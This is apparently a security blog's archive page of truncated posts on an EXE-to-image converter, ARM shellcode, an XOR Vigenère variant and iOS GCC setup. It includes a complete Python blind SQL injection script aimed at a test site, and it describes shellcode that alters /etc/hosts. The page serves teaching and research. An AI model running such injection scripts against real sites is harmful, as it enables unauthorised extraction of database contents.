Uncategorized

Exe2Image

This is A simple utility to convert EXE files to PNG images and vice versa. This is written using Java 8. Inspired by this article.

View post on imgur.com

Putty.exe converted to an image using green pixels.

View post on imgur.com

Download:
https://github.com/OsandaMalith/Exe2Image/releases

This tool was added to PentestBox : https://modules.pentestbox.com/#forensics

Softpedia:
http://www.softpedia.com/get/Security/Encrypting/EXE-to-Image-Converter.shtml

Other Shares:
http://www.kitploit.com/2017/09/exe2image-simple-utility-to-convert-exe.html

Automated Blind SQL Injector

There are lots of tools available for blind injection but when it comes to customizing payloads and bypassing WAFs I thought of writing my own program to extract data based on the true and false boolean conditions.

This is the Python version: https://github.com/OsandaMalith/BSSQLi/blob/master/bssqli.py

import urllib2
import re

# CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
# https://creativecommons.org/licenses/by/2.0/

url = 'http://testphp.vulnweb.com/artists.php?artist=2' # target
payload = '(select user())'; # your payload
trueString = 'Blad3' # Text or html in the true condition
maxLength = 20
result = ''
for i in range(1, maxLength + 1):
    for j in range(32, 127):
        if(chr(j).isupper()):
            continue
        sql = " and substring("+ payload +"," + str(i) + ",1)=" + hex(ord(chr(j))) + "-- -"
        target = url + sql
        req = urllib2.Request(target)
        # If cookies exists
        # req.add_header('Cookie','value=1;value=2')
        page = urllib2.urlopen(req)
        html = page.read()

        try:
            re.search(r'(.*)'+trueString+'(.*?) .*', html, flags=re.DOTALL).group(1)
            print ('Found: ' + chr(j))
            result += chr(j)
        except:
            pass

print (result)

(more…)

Installing GCC on iOS 8

I recently entered the world of mobile security and pen-testing. I wanted to install GCC in a jailbroken iOS 8.3 and had to face lots of issues in finding the correct package for it. So I somehow managed to install and run my own C apps 🙂 I thought of sharing this with you, if you are too struggling like me here’s how I managed to install this.

First install OpenSSH and essential bash commands like apt-get, sed, ps, etc. After that you have to install few debian packages along with gcc. Download this zip file I made and drop it into any folder in your iPhone using a SFTP connection or a desktop file browser. After that install all the packages in it.

[code language=”bash”]
$ dpkg -i *.deb
[/code]
(more…)

Getting Shellcode from ARM Binaries

For x86 and x86_64 there are already commands for extracting shellcode and printing them nicely formatted. But when it comes to ARM none of them work would because of the way objdump would dump the opcodes. For example if this is my sample program:

.section .text

.global _start



_start:



    .code 32

    # Thumb-Mode on

    add     r6, pc, #1

    bx  r6



    .code   16

    # _write()

    mov     r2, #7

    mov r1, pc

    add r1, #12

    mov     r0, $0x1

    mov     r7, $0x4

    svc     0



    # _exit()

    sub r0, r0, r0

    mov     r7, $0x1

    svc 0



.ascii "Osanda\n"

(more…)

Breaking the Vigenère Cipher

The Vigenère cipher is a very known cipher for centuries, you can read more about it from here. It uses a series of Caesar ciphers to encrypt the text. Sometime ago I came across a challenge in breaking the Vigenère cipher. But this was a variant of a Vigenère cipher which uses XOR gate instead of normal polyalphabetic substitution. Here is the encryption program. In a challenge you won’t get the encryption program but however you can code it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#include <stdio.h>
#define KEY_LENGTH 7
/*
* Title: Variant of a Vignere Cipher Encrypter
* Author: Osanda Malith Jayathissa
* Website: http://osandamalith.wordpress.com
*/
int main() {
 
  FILE *fpIn, *fpOut;
  unsigned char ch;
  unsigned char key[KEY_LENGTH] = {0xBA, 0x1F, 0x91, 0xB2, 0x53, 0xCD, 0x3E};
 
  fpIn = fopen("ptext.txt", "r");
  fpOut = fopen("ctext.txt", "w");
 
  for (size_t i = 0; fscanf(fpIn, "%c", &ch) != EOF; ++i)
  if (ch!='\n') fprintf(fpOut, "%02X", ch ^ key[i % KEY_LENGTH]);  
 
  fclose(fpIn);
  fclose(fpOut);
  
  return 0;
}

(more…)

Running Shellcode in your Raspberry Pi

I was interested in learning ARM assembly language for developing small applications for microcontrollers. I wrote this small piece of shellcode which will write “127.0.0.1 google.lk” inside the /etc/hosts file in a Linux system. I used my Raspberry Pi model B+ for this 🙂
Image result for raspberry pi b+
We will be needing the following syscalls.

[code language=”c”]
#define __NR_exit (__NR_SYSCALL_BASE+ 1)
#define __NR_write (__NR_SYSCALL_BASE+ 4)
#define __NR_open (__NR_SYSCALL_BASE+ 5)
#define __NR_close (__NR_SYSCALL_BASE+ 6)
[/code]

(more…)